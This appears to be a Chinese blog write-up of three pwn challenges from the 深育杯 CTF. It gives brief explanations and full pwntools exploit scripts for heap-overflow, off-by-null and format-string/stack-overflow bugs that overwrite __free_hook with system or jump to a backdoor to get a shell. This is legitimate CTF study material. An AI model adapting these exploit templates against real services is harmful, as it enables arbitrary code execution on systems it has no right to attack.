深育杯

Word count: 667   |   Reading time≈ 4 min

政企组第22

createcode

堆溢出构造overlap修改fd指针attack free_hook

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# -*- coding: utf-8 -*-
from pwn import *
r=remote('192.168.41.10',2007)
libc=ELF('libc.so.6')
  
def add(con):
    r.recvuntil('> ')
    r.sendline('1')
    r.recvuntil('content: ')
    r.send(con)
def show(idx):
    r.recvuntil('> ')
    r.sendline('2')
    r.recvuntil('id: ')
    r.sendline(str(idx))
def delete(idx):
    r.recvuntil('> ')
    r.sendline('3')
    r.recvuntil('id: ')
    r.sendline(str(idx))

add('HRP')
add('HRP')
add('HRP')
add('HRP')
delete(0)
add(0x328*'HRP'+p64(0x330*2+1))
delete(0)
add('HRP')
show(0)
r.recvuntil('\x7f')
libc.address=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-libc.sym['__malloc_hook']-0x10
add('/bin/sh\x00')
add('HRP')
delete(3)
delete(2)
delete(1)
delete(0)
add(0x328*'HRP'+p64(0x330+1)+p64(libc.sym['__free_hook']-8))
add(0x328*'HRP'+p64(0x330+1)+'/bin/sh\x00')
add(8*'HRP'+p64(libc.sym['system']))
delete(1)
r.interactive()

writebook

edit存在off by null漏洞,模板题直接overlap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
# coding=utf-8
from pwn import *

r = process("./writebook")
context.arch = 'amd64'
context.log_level = 'debug'
libc = ELF('./libc.so.6')
elf = ELF('./writebook')


def choice(c):
 r.recvuntil(">")
 r.sendline(str(c))

def add1(size):
 choice(1)
 choice(1)
 r.recvuntil(":")
 r.sendline(str(size))

def add2(size):
 choice(1)
 choice(2)
 r.recvuntil(":")
 r.sendline(str(size))

def edit(index,content):
 choice(2)
 r.recvuntil(":")
 r.sendline(str(index))
 r.recvuntil(":")
 r.sendline(content)

def show(index):
 choice(3)
 r.recvuntil(":")
 r.sendline(str(index))

def free(index):
 choice(4)
 r.recvuntil(":")
 r.sendline(str(index))

for i in range(9):
	add1(0x98)
for i in range(8):
	free(i)
for i in range(7):
	add1(0x98)
add1(50)
show(7)
leak = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak-0x3ebd30
fh = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success(hex(leak))
success(hex(libc_base))
for i in range(9):
	free(i)
for i in range(7):
    add1(0xf0)
add1(0xf0)#7
add1(0x88)#8
add1(0xf0)#9
add1(0x88)#10
for i in range(7):
    free(i)
free(8)
free(7)
add1(0x88)#0
edit(0,"a"*0x80+p64(0x90+0x100))
free(9)
for i in range(7):
    add1(0xf0)
    edit(i,"/bin/sh\x00")
add1(0xf0)#9
add1(0xf0)#10

free(0)
edit(9,p64(fh))
add1(0xf0)
add1(0xf0)
edit(11,p64(system))
edit(10,'/bin/sh\x00')
free(10)

r.interactive()

find_flag

格式化字符串泄露canary以及程序加载基地址,远程的基地址要fuzz下

栈溢出跳转后门getflag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from pwn import *
context.log_level='debug'
def pwn():
	#gdb.attach(r,'b *$rebase(0x13E2)')
	r.recv()
	pay="%17$p~%15$p"
	r.sendline(pay)
	r.recvuntil('Nice to meet you, ')
	canary=int(r.recv(18),16)
	r.recv(1)
	addr=int(r.recv(14),16)+0xe8
	print(hex(canary))
	print(hex(addr))
	r.recvuntil("Anything else? ")
	pay=b'a'*(0x40-8)+p64(canary)+b'a'*8+p64(addr)
	r.sendline(pay)
while(1):
	try:
		#r=process('./fn')
		r=remote('192.168.41.125',2001)
		pwn()
		a=r.recv()
		print(a)
		if 'flag' in a:
			print(a)
			break
			r.close()
	except:
		r.close()
  • Copyright: Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
  • Copyrights © 2021-2023 H.greed
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信